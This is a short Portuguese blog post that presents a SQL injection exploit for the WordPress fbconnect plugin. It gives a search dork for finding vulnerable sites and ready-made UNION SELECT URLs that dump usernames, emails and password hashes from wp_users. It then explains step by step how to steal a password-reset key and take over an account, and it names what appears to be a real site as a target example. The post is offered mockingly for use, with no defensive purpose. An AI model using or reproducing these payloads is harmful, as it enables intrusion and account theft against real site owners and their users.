segunda-feira, 30 de setembro de 2013

Exploit Wordpress fbconnect_action pei pei pei

Exploit Wordpress
Exploit Wordpress fbconnect_action pei pei pei

DORK['1']:inurl:"/?fbconnect_action=myhome"


http://VULL.COM/?fbconnect_action=myhome&userid=2[BUG-SQL]

EXPLOIT:
Mostrando user,email,senha(user_login,user_email,user_pass):
http://VULL.COM/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_email,user_pass),7,8,9,10,11,12+from+wp_users--


Com o email do usuário em mãos, vá até o painel de administrador.

http://VULL.COM/wp-login.php
"click em Lost your password ?"
É peça uma nova senha enviando para o e-mail.


Agora vamos consultar a KEY gerada pelo wordpress CAMPO:KEY=user_activa​

http://VULL.COM/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_activa​tion_key),7,8,9,10,11,12+from+wp_users--


Vamos modificar a senha do usuario com a KEY CAPTURADA

http://VULL.COM/wp-login.php?action=rp&key=[KEY]&login=[NOME_USUARIO]
USANDO:
http://VULL.COM/wp-login.php?action=rp&key=65465465AWDAD46546465464&login=MARIA

Pronto agora só trocar a senha do usuario e seja feliz Hackeiro hahahahahaahaha.


EXEMPLO:
http://www.artkernel.com/?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_email,user_pass),7,8,9,10,11,12+from+wp_users--